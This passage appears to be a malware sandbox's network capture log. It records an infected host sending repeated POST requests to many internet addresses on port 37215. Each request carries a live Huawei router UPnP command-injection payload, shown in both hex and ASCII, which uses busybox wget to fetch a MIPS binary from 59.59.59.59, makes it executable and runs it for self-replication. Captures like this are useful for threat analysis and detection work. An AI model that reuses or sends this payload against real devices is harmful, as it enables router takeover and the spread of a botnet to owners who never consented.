6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1674192.168.2.1536506197.47.58.9337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.943361044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1675192.168.2.1536776157.50.235.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.943397999 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1676192.168.2.154625063.76.10.24337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.943456888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1677192.168.2.1555806171.118.201.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.943481922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1678192.168.2.1552970197.201.42.13137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.943614960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1679192.168.2.154840241.244.128.10337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.910101891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1680192.168.2.1535788148.114.250.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.910120010 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1681192.168.2.153912223.109.213.14237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.910149097 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1682192.168.2.15539568.208.82.21537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.936131001 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1683192.168.2.1545808197.230.231.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.936156988 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1684192.168.2.155605441.237.143.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.936233044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
